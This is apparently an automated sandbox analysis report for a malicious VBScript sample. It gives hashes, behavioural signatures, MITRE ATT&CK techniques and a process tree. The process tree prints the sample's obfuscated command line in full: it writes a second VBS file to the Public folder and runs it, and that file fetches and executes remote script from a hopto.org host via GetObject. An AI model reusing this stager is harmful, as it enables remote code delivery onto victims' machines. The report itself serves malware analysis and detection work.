08a0b15c443314a9090592656397f28910afc787740c45a419ddc6b74af77b88

Analysis

max time kernel
224s
max time network
293s
platform
windows10-2004_x64
resource
win10v2004-20220812-es
resource tags

arch:x64arch:x86image:win10v2004-20220812-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
20/09/2022, 00:01

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

08a0b15c443314a9090592656397f28910afc787740c45a419ddc6b74af77b88.vbs
Size

3KB
MD5

643206ec240c27db3a1aaec3f007f2eb
SHA1

16997561aa451fa3116692ff25fbdd78b78e5edf
SHA256

08a0b15c443314a9090592656397f28910afc787740c45a419ddc6b74af77b88
SHA512

bf64da05ab751fe1894a53b81a675a40b6965babb5cd652dcf6f619790cf89e953637a1fc464fbc20b7ece6e72f9543f05213dbafb572c726d1432d6a475871c

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	4428	WScript.exe
8	4428	WScript.exe
10	4428	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	cmd.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3240 wrote to memory of 5088	3240	WScript.exe	80
PID 3240 wrote to memory of 5088	3240	WScript.exe	80
PID 5088 wrote to memory of 4888	5088	cmD.exe	82
PID 5088 wrote to memory of 4888	5088	cmD.exe	82
PID 5088 wrote to memory of 4828	5088	cmD.exe	83
PID 5088 wrote to memory of 4828	5088	cmD.exe	83
PID 4828 wrote to memory of 4860	4828	cmd.exe	84
PID 4828 wrote to memory of 4860	4828	cmd.exe	84
PID 4860 wrote to memory of 4428	4860	cmd.exe	86
PID 4860 wrote to memory of 4428	4860	cmd.exe	86

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08a0b15c443314a9090592656397f28910afc787740c45a419ddc6b74af77b88.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3240
- C:\Windows\System32\cmD.exe
  cmD ^/V/D/c ecHo function orz8LSY(GASMZVi4H999) orz8LSY= replace(GASMZVi4H999,"QZg","m" ): end function: F75lcR208="Sc": KvepBXx8Jm6ru5ZQ406="TT": Z1NNac6kIDkmFOqZ682="1": J5oSiqMjOPkX640="ri": DI0oRpsrn75ja220 = orz8LSY(F75lcR208 +J5oSiqMjOPkX640+"*pt*:H*"+ KvepBXx8Jm6ru5ZQ406 +"pS://boggayQZg1.hopto.org/***g*" + Z1NNac6kIDkmFOqZ682): GetObject(OcGtqwH(DI0oRpsrn75ja220)) :function OcGtqwH(gJq14jFowfL369) OcGtqwH= replaCe(gJq14jFowfL369,"*","" ): End function > nul > C:\Users\Public\^Z1NNac6kIDkmFOqZ682.vbs |^start cmd /c start C:\Users\Public\^Z1NNac6kIDkmFOqZ682.vbs
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ecHo function orz8LSY(GASMZVi4H999) orz8LSY= replace(GASMZVi4H999,"QZg","m" ): end function: F75lcR208="Sc": KvepBXx8Jm6ru5ZQ406="TT": Z1NNac6kIDkmFOqZ682="1": J5oSiqMjOPkX640="ri": DI0oRpsrn75ja220 = orz8LSY(F75lcR208 +J5oSiqMjOPkX640+"*pt*:H*"+ KvepBXx8Jm6ru5ZQ406 +"pS://boggayQZg1.hopto.org/***g*" + Z1NNac6kIDkmFOqZ682): GetObject(OcGtqwH(DI0oRpsrn75ja220)) :function OcGtqwH(gJq14jFowfL369) OcGtqwH= replaCe(gJq14jFowfL369,"*","" ): End function 1>C:\Users\Public\Z1NNac6kIDkmFOqZ682.vbs"
    3⤵
    PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" start cmd /c start C:\Users\Public\Z1NNac6kIDkmFOqZ682.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\system32\cmd.exe
      cmd /c start C:\Users\Public\Z1NNac6kIDkmFOqZ682.vbs
      4⤵
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:4860
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\Z1NNac6kIDkmFOqZ682.vbs"
        5⤵
        Blocklisted process makes network request
        
        PID:4428

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Z1NNac6kIDkmFOqZ682.vbs

Filesize
452B

MD5
e63b58ee45486ed1d3fdafd9d5f16b41

SHA1
0af7cb05ce631a7d16a8ba6b4288df17b228a8d5

SHA256
79351eac56b2e7631fec4a37ddc399a859106637addf2b1ec4e9d510a6acb058

SHA512
a3743e98d5296be98bedab9e9567ef839281cb4e01407fe77a7e4b26b0e95b0aeecbbbf9acdba95ffb3b34aaef1460074eb1da4b8170de54462208f21ee2f6c4

Download Submit